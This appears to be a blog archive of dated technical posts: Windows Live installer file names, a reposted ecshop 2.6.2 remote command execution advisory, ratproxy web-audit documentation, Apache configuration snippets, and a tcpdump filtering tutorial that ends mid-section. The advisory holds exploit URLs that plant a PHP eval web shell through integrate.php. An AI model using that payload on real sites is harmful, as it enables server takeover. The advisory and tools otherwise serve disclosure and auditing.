Messenger – Messenger-ship-en.cab
Mail – Mail-ship-en.cab
Writer – writer-ship-en.cab
SkyDrive 和 Photos Upload Tool – RichUpload-ship-en.cab
Photo Gallery – PhotoLibrary-ship-en.cab
Movie Maker – MovieMaker-ship-en.cab
Toolbar – wltinstall-ship-en.cab
Contacts – Contacts-ship-neutral.cab
Sync – WindowsLiveSync-ship-en.cab
Login Assistant – wllogin-ship-en.cab
Outlook Connector – olc-ship-en.cab
Spam Filter – SpamFilterData-ship-neutral.cab
AllSetup – wlsetup-all.exe and wlsetup-web.exe
May 31
May 30
This is a discussion on “ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities” within the Public part of the Exploits section; Feel free to discuss about this proof-of-concept code Download: exploit…
######################### Securitylab.ir ########################
# Application Info:
# Name: ecshop
# Version: 2.6.2
# Website: http://www.ecshop.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir & K4mr4n_st@yahoo.com
#################################################################
#===========================================================
# :: integrate.php ::
#
# if ($_REQUEST['act'] == 'sync')
# {
# $size = 100;
# ......
# $tasks = array();
# if ($task_del > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
# $del_list = $db->getCol($sql);//$del_list
# }
# if ($task_rename > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
# $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
# $rename_list = $db->getAll($sql);//$rename_list
# }
# if ($task_ignore >0)
# {
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
# $ignore_list = $db->getCol($sql);//$ignore_list
# }
# ....
# $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
# $log = '';
# if (isset($del_list))
# {
# $log .= '$del_list=' . var_export($del_list,true) . ';';
# }
# if (isset($rename_list))
# {
# $log .= '$rename_list=' . var_export($rename_list, true) . ';';
# }
# if (isset($ignore_list))
# {
# $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
# }
# fwrite($fp, $log);
# fclose($fp);
# $smarty->assign('tasks', $tasks);
# $smarty->assign('ur_here',$_LANG['user_sync']);
# $smarty->assign('size', $size);
# $smarty->display('integrates_sync.htm');
# }
#
#
# http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
May 29
- Written and maintained by Michal Zalewski <lcamtuf@google.com>.
What is ratproxy?
Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments. The approach taken with ratproxy offers several important advantages over more traditional methods:
- No risk of disruptions. In the default operating mode, tool does not generate a high volume of attack-simulating traffic, and as such may be safely employed against production systems at will, for all types of ad hoc, post-release audits. Active scanners may trigger DoS conditions or persistent XSSes, and hence are poorly suited for live platforms.
- Low effort, high yield. Compared to active scanners or fully manual proxy-based testing, ratproxy assessments take very little time or bandwidth to run, and proceed in an intuitive, distraction-free manner – yet provide a good insight into the inner workings of a product, and the potential security vulnerabilities therein. They also afford a consistent and predictable coverage of user-accessible features.
- Preserved control flow of human interaction. By silently following the browser, the coverage in locations protected by nonces, during other operations valid only under certain circumstances, or during dynamic events such as cross-domain Referer data disclosure, is greatly enhanced. Brute-force crawlers and fuzzers usually have no way to explore these areas in a reliable manner.
- WYSIWYG data on script behavior. Javascript interfaces and event handlers are explored precisely to a degree they are used in the browser, with no need for complex guesswork or simulations. Active scanners often have a significant difficulty exploring JSON responses, XMLHttpRequest() behavior, UI-triggered event data flow, and the like.
- Easy process integration. The proxy can be transparently integrated into an existing manual security testing or interface QA processes without introducing a significant setup or operator training overhead.
Is it worth trying out?
There are numerous alternative proxy tools meant to aid security auditors – most notably
WebScarab, Paros, Burp, ProxMon, and Pantera. Stick with whatever suits your needs, as long as you get the data you need in the format you like.
That said, ratproxy is there for a reason. It is designed specifically to deliver concise reports that focus on prioritized issues of clear relevance to contemporary web 2.0 applications, and to do so in a hands-off, repeatable manner. It should not overwhelm you with raw HTTP traffic dumps, and it goes far beyond simply providing a framework to tamper with the application by hand.
Ratproxy implements a number of fairly advanced and unique checks based on our experience with these applications, as well as all the related browser quirks and content handling oddities. It features a sophisticated content-sniffing functionality capable of distinguishing between stylesheets and Javascript code snippets, supports SSL man-in-the-middle, on the fly Flash ActionScript decompilation, and even offers an option to confirm high-likelihood flaw candidates with very lightweight, a built-in active testing module.
Last but not least, if you are undecided, the proxy may be easily chained with third-party security testing proxies of your choice.
How does it avoid false positives?
Operating in a non-disruptive mode makes the process of discovering security flaws particularly challenging, as the presence of some vulnerabilities must be deduced based on very subtle, not always reliable cues – and even in active testing modes, ratproxy strives to minimize the amount of rogue traffic generated, and side effects caused.
The set of checks implemented by ratproxy is outlined later on – but just as importantly, underneath all the individual check logic, the proxy uses a number of passively or semi-passively gathered signals to more accurately prioritize reported problems and reduce the number of false alarms as much as possible. The five core properties examined for a large number of checks are:
- What the declared and actually detected MIME type for the document is. This is a fairly important signal, as many problems manifest themselves only in presence of subtle mismatches between these two – whereas other issues need to be treated as higher or lower priority based on this data. More fundamentally, the distinction between certain classes of content – such as "renderables" that may be displayed inline by the browser – is very important to many checks.
- How pages respond to having cookie-based authentication removed. This provides useful information on whether the resource is likely to contain user-specific data, amongst other things. Carefully preselected requests that fail some security checks are replayed as-is, but with authentication data removed; responses are then compared, with virtually no risk of undesirable side effects in common applications.
- Whether requests seem to contain non-trivial, sufficiently complex security tokens, or other mechanisms that may make the URL difficult to predict. This provides information needed to determine the presence of XSRF defenses, to detect cross-domain token leakage, and more. (In active testing mode, the function of such tokens is further validated by replaying the request with modified values.)
- Whether any non-trivial parts of the query are echoed back in the response, and in what context. This is used to pick particularly interesting candidates for XSS testing – or, in active mode, to schedule low-overhead, lightweight probes.
- Whether the interaction occurs on a boundary of a set of domains defined by runtime settings as the trusted environment subjected to the audit, and the rest of the world. Many boundary behaviors have a special significance, as they outline cross-domain trust patterns and information disclosure routes.
In addition to this, several places employ check-specific logic to further fine-tune the results.
What specific tests are implemented?
Key low-level check groups implemented by ratproxy are:
- Potentially unsafe JSON-like responses that may be vulnerable to cross-domain script inclusion. JSON responses may be included across domains by default, unless safe serialization schemes, security tokens, or parser breaking syntax is used. Ratproxy will check for these properties, and highlight any patterns of concern.
- Bad caching headers on sensitive content. Ratproxy is able to accurately detect presence of several types of sensitive documents, such as locations that return user-specific data, or resources that set new, distinctive cookies. If the associated requests have predictable URLs, and lack HTTP caching directives that would prevent proxy-level caching, there is a risk of data leakage.
In pedantic mode, ratproxy will also spot differences in HTTP/1.1 and HTTP/1.0 caching intents – as these may pose problems for a fraction of users behind legacy cache engines (such as several commercial systems used to date by some corporations).
- Suspicious cross-domain trust relationships. Based on the observation of dynamic control flow, and a flexible definition of trusted perimeter, ratproxy is capable of accurately detecting dangerous interactions between domains, including but not limited to:
- Security token leakage via Referer headers,
- Untrusted script or stylesheet inclusion,
- General references to third-party domains,
- Mixed content issues in HTTPS-only applications,
- Tricky cross-domain POST requests in single sign-on systems.
- Numerous classes of content serving issues – a broad class of problems that lead to subtles XSSes, and includes MIME type mismatches, charset problems, Flash issues, and more. Research indicates that a vast number of seemingly minor irregularities in content type specifications may trigger cross-site scripting in unusal places; for example, subtle mistakes such as serving GIF files as image/jpeg, typing utf8 instead of utf-8 in Content-Type headers, or confusing HTTP charset with XML declaration charset values are all enough to cause trouble. Even seemingly harmless actions such as serving valid, attacker-controlled PNG images inline were known to cause problems due to browser design flaws.
Likewise, certain syntax patterns are dangerous to return to a browser regardless of MIME types, as there are known methods to have MIME types overridden or ignored altogether. Ratproxy uses a set of fairly advanced checks that spot these problems with a considerable accuracy and relatively few false positives in contemporary scenarios, accounting for various classes of content served.
- Queries with insufficient XSRF defenses (POSTs, plus any requests that set cookies by default; and other suspicious looking GET requests as an option). In active testing mode, the proxy will also actually try to validate XSRF protections by replaying requests with modified token values, and comparing responses.
- Suspected or confirmed XSS / data injection vectors, including attacks through included JSON-based script injection, or response header splitting. In the default, passive mode, ratproxy does not attempt to confirm the quality of XSS filtering in tested applications, but it will automatically enumerate and annotate the best subjects for manual inspection – and will offer the user the ability to feed this data to external programs, or modify and replay interesting requests on the fly. The proxy will also take note of any seemingly successful manual XSS attempts taken by the user.
In active testing mode, the proxy will go one step further and attempt a single-shot verification of XSS filtering mechanisms, carefully tweaking only these request parameters that truly need to be tested at the time (and carefully preserving XSRF tokens, and more).
- HTTP and META redirectors. Redirectors, unless properly locked down, may be used without owner’s content, which in some contexts might be considered undesirable. Furthermore, in extreme cases, poorly implemented redirectors may open up cross-site scripting vectors in less common browsers.
Ratproxy will take note of any redirectors observed for further testing.
- A broad set of other security problems, such as alarming Javascript, OGNL, Java, SQL statements, file inclusion patterns, directory indexes, server errors, and so forth. Ratproxy will preselect particularly interesting candidates for further testing.
In the initial beta, not all web technologies may necessarily be analyzed to greatest extent possible. We intend to actively extend and improve the tool based on your feedback, however.
- Several additional, customizable classes of requests and responses useful in understanding the general security model of the application (file upload forms, POST requests, cookie setters, etc).
For a full list of individual issues reported, please see messages.list in the source tarball.
What is the accuracy of reported findings?
Ratproxy usually fares very well with typical, rich, modern web applications – that said, by the virtue of operating in passive mode most of the time, all the findings reported merely highlight areas of concern, and are not necessarily indicative of actual security flaws. The information gathered during a testing session should be then interpreted by a security professional with a good understanding of the common problems and security models employed in web applications.
Please keep in mind that the tool is still in beta, and you may run into problems with technologies we had no chance to examine, or that were not a priority at this time. Please contact the author to report any issues encountered.
How to interpret and address the issues reported?
Many of the problems reported by ratproxy are self-explanatory and straightforward to address. Some challenges, however, might require a more in-depth analysis to fully qualify and resolve.
There are several organizations that put a considerable effort into documenting and explaining these problems, and advising the public on how to address them. We encourage you to refer to the materials published by
OWASP and Web Application Security Consortium, amongst others:
How to run the proxy?
NOTE: Please do not be evil. Use ratproxy only against services you own, or have a permission to test. Keep in mind that although the proxy is mostly passive and unlikely to cause disruptions, it is not stealth. Furthermore, the proxy is not designed for dealing with rogue and misbehaving HTTP servers and clients – and offers no guarantees of safe (or sane) behavior there.
Initiating ratproxy sessions is fairly straigtforward, once an appropriate set of runtime options is dediced upon. Please familiarize yourself with these settings, as they have a very significant impact on the quality of produced reports.
The main binary, ./ratproxy, takes the following arguments:
-w logfile - this option causes raw, machine-readable proxy logs to be written to a specified file. By default, all data is written to stdout only. The log produced this way is not meant for human consumption - it might be postprocessed with third-party utilities, or pretty-printed using 'ratproxy-report.sh', however. -v logdir - prompts ratproxy to store full HTTP traces of all requests featured in the logfile, writing them to a specified directory. In most cases, it is advisable to enable this option, as it provides useful hints for further analysis. -p port - causes ratproxy to listen for browser connections on a TCP port different than the default 8080. -r - instructs ratproxy to accept remote connections. By default, the proxy listens on loopback interfaces only. This option enables remote access to the service. WARNING: Ratproxy does not feature any specific access control mechanisms, and may be abused if exposed to the Internet. Please make sure to use proper firewall controls whenever using -r option to prevent this. -d domain - specifies a domain name suffix used to distinguish between the audited infrastructure and third-party sites. Host names that match -d values will be subjected to analysis, and ones that do not will be considered the outside world. Interactions between these two classes will be subjected to additional checks. NOTE: This feature is extremely important for several of the checks implemented by ratproxy. If -d option is missing, ratproxy will treat all URLs as being a part of the audited service, and cross-domain interaction checks will not be carried out at all. If it is set incorrectly, report coverage may decrease. Multiple -d options may and often should be combined to define the perimeter for testing and flow analysis (e.g., -d example.com -d example-ads-service.com -d example-ng.com). -P host:port - causes ratproxy to talk to an upstream proxy instead of directly routing requests to target services. Useful for testing systems behind corporate proxies, or chaining multiple proxy-type security testing tools together. -l - ratproxy sometimes needs to tell if a page has substantially changed between two requests to better qualify the risks associated with some observations. By default, this is achieved through strict page checksum comparison (MD5). This options enables an alternative, relaxed checking mode that relies on page length comparison instead. Since some services tend to place dynamically generated tokens on rendered pages, it is generally advisable to enable this mode most of the time. -2 - several services are known to render the same page with dynamic content of variable length in response to two subsequent, otherwise identical requests. This might be a result of inline ad rendering, or other content randomization. When dealing with such services, ratproxy might be instructed to acquire three, not two, samples for page comparison for some checks, to further minimize the number of false positives. -e - enables pedantic caching header validation. Security problems may arise when documents clearly not meant to be cached are served in a way that permits public proxies to store them. By default, ratproxy detects poorly chosen HTTP/1.1 caching directives that are most likely to affect general population. Some additional issues may appear with users behind legacy proxies that support HTTP/1.0 only, however - as is the case with several commercial solutions. These proxies may ignore HTTP/1.1 directives and interpret HTTP/1.0 cues only. In -e mode, ratproxy will complain about all cases where there appears to be a mismatch between HTTP/1.0 and HTTP/1.1 caching intents. This tends to generate a large number of warnings for many services; if you prefer to focus on more pressing issues first, you might want to keep it off at first. -x - tells the proxy to log all URLs that seem to be particularly well-suited for further, external XSS testing (by the virtue of being echoed on the page in a particular manner). By default, ratproxy will not actually attempt to confirm these vectors (-X option enables disruptive checking, however) - but you will be able to use the data for manual testing or as input to third-party software. Generally recommended, unless it proves to be too noisy. -t - by default, ratproxy logs some of the most likely directory traversal candidates. This option tells the proxy to log less probable guesses, too. These are good leads for manual testing or as input to an external application. Generally recommended, unless it proves to be too noisy. -i - with this option supplied, ratproxy will log all PNG files served inline. PNG files are a cross-site scripting vector in some legacy browsers. The default behavior is to log these images that require authentication only, based on the assumption that such images are most likely to be user-controlled. This option should be enabled when auditing applications that permit picture uploads and sharing; otherwise, it may just generate noise. -f - with this option enabled, the proxy will log all Flash applications encountered for further analysis. This is particularly useful when combined with -v, in which case, Flash files will be automatically disassembled and conveniently included in 'ratproxy-report.sh' output. Since recent Flash vulnerabilities make the platform a major potential cross-site scripting vector, it is advisable to enable this feature. -s - tells ratproxy to log all POST requests for further analysis and processing, in a separate section of the final report. This is useful for bookkeeping and manual review, since POST features are particularly likely to expose certain security design flaws. -c - enables logging of all URLs that seem to set cookies, regardless of their presumed security impact. Again, useful for manual design analysis and bookkeeping. Not expected to contribute much noise to the report. -g - extends XSRF token validation checks to GET requests. By default, the proxy requires anti-XSRF protection on POST requests and cookie setters only. Some applications tend to perform state changing operations via GET requests, too, and so with this option enabled, additional data will be collected and analyzed. This feature is verbose, but useful for certain application designs. -j - enables detection of discouraged Javascript syntax, such as eval() calls or .innerHTML operations. Javascript code that makes use of these will be tagged for manual inspection. -m - enables logging of "active" content referenced across domain boundaries to detect patterns such as remote image inclusion or remote linking (note that logging of remote script or stylesheet inclusion is enabled at all times). This option has an effect only when a proper set of domains is specified with -d command-line parameter - and is recommended for sites where a careful control of cross-domain trust relationships needs to be ensured. -X - enables active testing. When this option is provided, ratproxy will attempt to actively, disruptively validate the robustness of XSS and XSRF defenses whenever such a check is deemed necessary. By the virtue of doing passive preselection, this does not generate excessive traffic and maintains the same level of coverage as afforded in passive mode. The downside is that these additional requests may disrupt the application or even trigger persistent problems; as such, please exercise caution when using it against mission-critical production systems. -C - in disruptive testing mode, ratproxy will replay some requests with modified parameters. This may disrupt the state of some applications and make them difficult to navigate. To remediate this, -C option enables additional replaying of the unmodified request at the end of the process, in hopes of restoring the original server-side state. This option is generally recommended in -X mode. -k - instructs ratproxy that the application is expected to use HTTPS exclusively; any downgrades to HTTP will be reported and prioritized depending on potential impact. This option obviously makes sense only if the application is indeed meant to use HTTPS and HTTPS only. -a - tells ratproxy to indiscriminately log all visited URLs. Useful for assessing the coverage achieved.
In practice, for low verbosity reporting that looks for high-probability issues only, a good starting point is:
./ratproxy -v <outdir> -w <outfile> -d <domain> -lfscm
To increase verbosity and include output from some less specific checks, the following set of options is a good idea:
./ratproxy -v <outdir> -w <outfile> -d <domain> -lextifscgjm
For active testing, simply add -XC options as needed.
Once the proxy is running, you need to configure your web browser to point to the appropriate machine and port (a simple Firefox extension such as
QuickProxy may come handy in the long run); it is advisable to close any non-essential browser windows and purge browser cache, as to maximize coverage and minimize noise.
The next step is to open the tested service in your browser, log in if necessary, then interact with it in a regular, reasonably exhaustive manner: try all available views, features, upload and download files, add and delete data, and so forth – then log out gracefully and terminate ratproxy with Ctrl-C.
NOTE: Do not be tempted to tunnel automated spider traffic (e.g. wget -r or active scanners) via ratproxy. This will not have the desired effect. The tool depends strictly on being able to observe well-behaved, valid user-application interaction.
SECURITY WARNING: When interacting with SSL applications, ratproxy will substitute its own, dummy, self-signed certificate in place of that legitimately returned by the service. This is expected to generate browser warnings – click through them to accept the key temporarily for the site. Do not add the key permanently to your browser configuration – the key is known to anyone who ever downloaded the tool. Furthermore, please note that ratproxy will also forego any server certificate validation steps – so while interacting with the service in this mode, you can have no expectation of server identity, transmission integrity, or data privacy. Do not use important accounts and do not enter sensitive data while running ratproxy tests.
Once the proxy is terminated, you may further process its pipe-delimited (|), machine-readable, greppable output with third party tools if so desired, then generate a human-readable HTML report:
./ratproxy-report.sh ratproxy.log >report.html
This will produce an annotated, prioritized report with all the identified issues. When opened in a browser, you will have an opportunity to replay GET and POST requests, tweak their parameters, view traces, and inspect Flash disassemblies, too.
May 28
Changing protocol behavior with misbehaving clients
Earlier versions recommended that the following lines be included in httpd.conf to deal with known client problems. Since the affected clients are no longer seen in the wild, this configuration is likely no-longer necessary.
#
# The following directives modify normal HTTP response behavior.
# The first directive disables keepalive for Netscape 2.x and browsers that
# spoof it. There are known problems with these browser implementations.
# The second directive is for Microsoft Internet Explorer 4.0b2
# which has a broken HTTP/1.1 implementation and does not properly
# support keepalive when it is used on 301 or 302 (redirect) responses.
#
BrowserMatch “Mozilla/2″ nokeepalive
BrowserMatch “MSIE 4\.0b2;” nokeepalive downgrade-1.0 force-response-1.0
#
# The following directive disables HTTP/1.1 responses to browsers which
# are in violation of the HTTP/1.0 spec by not being able to grok a
# basic 1.1 response.
#
BrowserMatch “RealPlayer 4\.0″ force-response-1.0
BrowserMatch “Java/1\.0″ force-response-1.0
BrowserMatch “JDK/1\.0″ force-response-1.0
Prevent “Image Theft”
This example shows how to keep people not on your server from using images on your server as inline-images on their pages. This is not a recommended configuration, but it can work in limited circumstances. We assume that all your images are in a directory called /web/images.
SetEnvIf Referer “^http://www\.example\.com/” local_referal # Allow browsers that do not send Referer info SetEnvIf Referer “^$” local_referal <Directory /web/images>
Order Deny,Allow
Deny from all
Allow from env=local_referal
</Directory>
Do not log requests for images in the access log
This example keeps requests for images from appearing in the access log. It can be easily modified to prevent logging of particular directories, or to prevent logging of requests coming from particular hosts.
SetEnvIf Request_URI \.gif image-request
SetEnvIf Request_URI \.jpg image-request
SetEnvIf Request_URI \.png image-request
CustomLog logs/access_log common env=!image-request
Changing protocol behavior with misbehaving clients
Earlier versions recommended that the following lines be included in httpd.conf to deal with known client problems. Since the affected clients are no longer seen in the wild, this configuration is likely no-longer necessary.
# # The following directives modify normal HTTP response behavior. # The first directive disables keepalive for Netscape 2.x and browsers that # spoof it. There are known problems with these browser implementations. # The second directive is for Microsoft Internet Explorer 4.0b2 # which has a broken HTTP/1.1 implementation and does not properly # support keepalive when it is used on 301 or 302 (redirect) responses. # BrowserMatch "Mozilla/2" nokeepalive BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 # # The following directive disables HTTP/1.1 responses to browsers which # are in violation of the HTTP/1.0 spec by not being able to grok a # basic 1.1 response. # BrowserMatch "RealPlayer 4\.0" force-response-1.0 BrowserMatch "Java/1\.0" force-response-1.0 BrowserMatch "JDK/1\.0" force-response-1.0
May 27
Tcpdump prints out the headers of packets on a network interface that match the boolean expression.
It can also be run with the -w flag, which causes it to save the packet data to a file for later analysis,
and/or with the -b flag, which causes it to read from a saved packet file rather than to read packets from
a network interface. In all cases, only packets that match expression will be processed by tcpdump.
Tcpdump will, if not run with the -c flag, continue capturing packets until it is interrupted by a SIGINT signal
(generated, for example, by typing your interrupt character, typically control-C) or a SIGTERM signal (typically
generated with the kill(1) command); if run with the -c flag, it will capture packets until it is interrupted by
a SIGINT or SIGTERM signal or the specified number of packets have been processed.
SYNOPSIS
tcpdump [ -adeflnNOpqRStuvxX ] [ -c count ]
[ -C file_size ] [ -F file ]
[ -i interface ] [ -m module ] [ -r file ]
[ -s snaplen ] [ -T type ] [ -w file ]
[ -E algo:secret ] [ expression ]
Basic syntax :
Filtering hosts :
- Match any traffic involving 192.168.1.1 as destination or source
# tcpdump -i eth1 host 192.168.1.1
- As soure only
# tcpdump -i eth1 src host 192.168.1.1
- As destination only
# tcpdump -i eth1 dst host 192.168.1.1
Filtering ports :
- Match any traffic involving port 25 as source or destination
# tcpdump -i eth1 port 25
- Source
# tcpdump -i eth1 src port 25
- Destination
# tcpdump -i eth1 dst port 25
Network filtering :
# tcpdump -i eth1 net 192.168
# tcpdump -i eth1 src net 192.168
# tcpdump -i eth1 dst net 192.168
Protocol filtering :
# tcpdump -i eth1 arp
# tcpdump -i eth1 ip
# tcpdump -i eth1 tcp
# tcpdump -i eth1 udp
# tcpdump -i eth1 icmp
Let’s combine expressions :
—————————
Negation : ! or “not” (without the quotes)
Concatanate : && or “and”
Alternate : || or “or”
- This rule will match any TCP traffic on port 80 (web) with 192.168.1.254 or 192.168.1.200 as destination host
# tcpdump -i eth1 ‘((tcp) and (port 80) and ((dst host 192.168.1.254) or (dst host 192.168.1.200)))’
- Will match any ICMP traffic involving the destination with physical/MAC address 00:01:02:03:04:05
# tcpdump -i eth1 ‘((icmp) and ((ether dst host 00:01:02:03:04:05)))’
- Will match any traffic for the destination network 192.168 except destination host 192.168.1.200
# tcpdump -i eth1 ‘((tcp) and ((dst net 192.168) and (not dst host 192.168.1.200)))’
Advanced header filtering :
===========================
Before we continue, we need to know how to filter out info from headers
proto[x:y] : will start filtering from byte x for y bytes. ip[2:2] would filter bytes 3 and 4 (first byte begins by 0)
proto[x:y] & z = 0 : will match bits set to 0 when applying mask z to proto[x:y]
proto[x:y] & z !=0 : some bits are set when applying mask z to proto[x:y]
proto[x:y] & z = z : every bits are set to z when applying mask z to proto[x:y]
proto[x:y] = z : p[x:y] has exactly the bits set to z
Operators : >, <, >=, <=, =, !=
This may not be clear in the first place but you’ll find examples below involving these.
Of course, it is important to know what the protocol headers look like before diving into more advanced filters.
IP header
———
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding | <– optional
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| DATA … |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
I’ll consider we are only working with the IPv4 protocol suite for these examples.
In an ideal world, every field would fit inside one byte. This is not the case, of course.
Are IP options set ?
——————–
Let’s say we want to know if the IP header has options set. We can’t just try to filter out the 21st byte
because if no options are set, data start at the 21st byte. We know a “normal” header is usually 20 bytes
(160 bits) long. With options set, the header is longer than that. The IP header has the header
length field which we will filter here to know if the header is longer than 20 bytes.
+-+-+-+-+-+-+-+-+
|Version| IHL |
+-+-+-+-+-+-+-+-+
Usually the first byte has a value of 01000101 in binary.
Anyhow, we need to divide the first byte in half…
0100 = 4 in decimal. This is the IP version.
0101 = 5 in decimal. This is the number of blocks of 32 bits in the headers. 5 x 32 bits = 160 bits or 20 bytes.
The second half of the first byte would be bigger than 5 if the header had IP options set.
We have two ways of dealing with that kind of filters.
1. Either try to match a value bigger than 01000101. This would trigger matches for IPv4 traffic with IP options set,
but ALSO any IPv6 traffic !
In decimal 01000101 equals 69.
Let’s recap how to calculate in decimal.
0 : 0 \
1 : 2^6 = 64 \ First field (IP version)
0 : 0 /
0 : 0 /
-
0 : 0 \
1 : 2^2 = 4 \ Second field (Header length)
0 : 0 /
1 : 2^0 = 1 /
64 + 4 + 1 = 69
The first field in the IP header would usually have a decimal value of 69.
If we had IP options set, we would probably have 01000110 (IPv4 = 4 + header = 6), which in decimal equals 70.
This rule should do the job :
# tcpdump -i eth1 ‘ip[0] > 69′
Somehow, the proper way is to mask the first half/field of the first byte, because as mentionned earlier,
this filter would match any IPv6 traffic.
2. The proper way : masking the first half of the byte
0100 0101 : 1st byte originally
0000 1111 : mask (0×0f in hex or 15 in decimal). 0 will mask the values while 1 will keep the values intact.
=========
0000 0101 : final result
The correct filter :
# tcpdump -i eth1 ‘ip[0] & 15 > 5′
or
# tcpdump -i eth1 ‘ip[0] & 0×0f > 5′
DF bit (don’t fragment) set ?
—————————–
Let’s now trying to know if we have fragmentation occuring, which is not desirable. Fragmentation occurs
when a the MTU of the sender is bigger than the path MTU on the path to destination.
Fragmentation info can be found in the 7th and 8th byte of the IP header.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Bit 0: reserved, must be zero
Bit 1: (DF) 0 = May Fragment, 1 = Don’t Fragment.
Bit 2: (MF) 0 = Last Fragment, 1 = More Fragments.
The fragment offset field is only used when fragmentation occurs.
If we want to match the DF bit (don’t fragment bit, to avoid IP fragmentation) :
The 7th byte would have a value of :
01000000 or 64 in decimal
# tcpdump -i eth1 ‘ip[6] = 64′
Matching fragmentation ?
————————
- Matching MF (more fragment set) ? This would match the fragmented datagrams but wouldn’t match the last
fragment (which has the 2nd bit set to 0).
# tcpdump -i eth1 ‘ip[6] = 32′
The last fragment have the first 3 bits set to 0… but has data in the fragment offset field.
- Matching the fragments and the last fragments
# tcpdump -i eth1 ‘((ip[6:2] > 0) and (not ip[6] = 64))’
A bit of explanations :
“ip[6:2] > 0″ would return anything with a value of at least 1
We don’t want datagrams with the DF bit set though.. the reason of the “not ip[6] = 64″
If you want to test fragmentation use something like :
ping -M want -s 3000 192.168.1.1
Matching datagrams with low TTL
——————————-
The TTL field is located in the 9th byte and fits perfectly into 1 byte.
The maximum decimal value of the TTL field is thus 255 (11111111 in binary).
This can be verified :
$ ping -M want -s 3000 -t 256 192.168.1.200
ping: ttl 256 out of range
+-+-+-+-+-+-+-+-+
| Time to Live |
+-+-+-+-+-+-+-+-+
We can try to find if someone on our network is using traceroute by using something like this on the gateway :
# tcpdump -i eth1 ‘ip[8] < 5′
Matching packets longer than X bytes
————————————
Where X is 600 bytes
# tcpdump -i eth1 ‘ip[2:2] > 600′
More IP filtering
—————–
We could imagine filtering source and destination addresses directly in decimal addressing.
We could also match the protocol by filtering the 10th byte.
It would be pointless anyhow, because tcpdump makes it already easy to filter out that kind of info.
TCP header
———-
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |C|E|U|A|P|R|S|F| |
| Offset| Res. |W|C|R|C|S|S|Y|I| Window |
| | |R|E|G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- Matching any TCP traffic with a source port > 1024
# tcpdump -i eth1 ‘tcp[0:2] > 1024′
- Matching TCP traffic with particular flag combinations
The flags are defined in the 14th byte of the TCP header.
+-+-+-+-+-+-+-+-+
|C|E|U|A|P|R|S|F|
|W|C|R|C|S|S|Y|I|
|R|E|G|K|H|T|N|N|
+-+-+-+-+-+-+-+-+
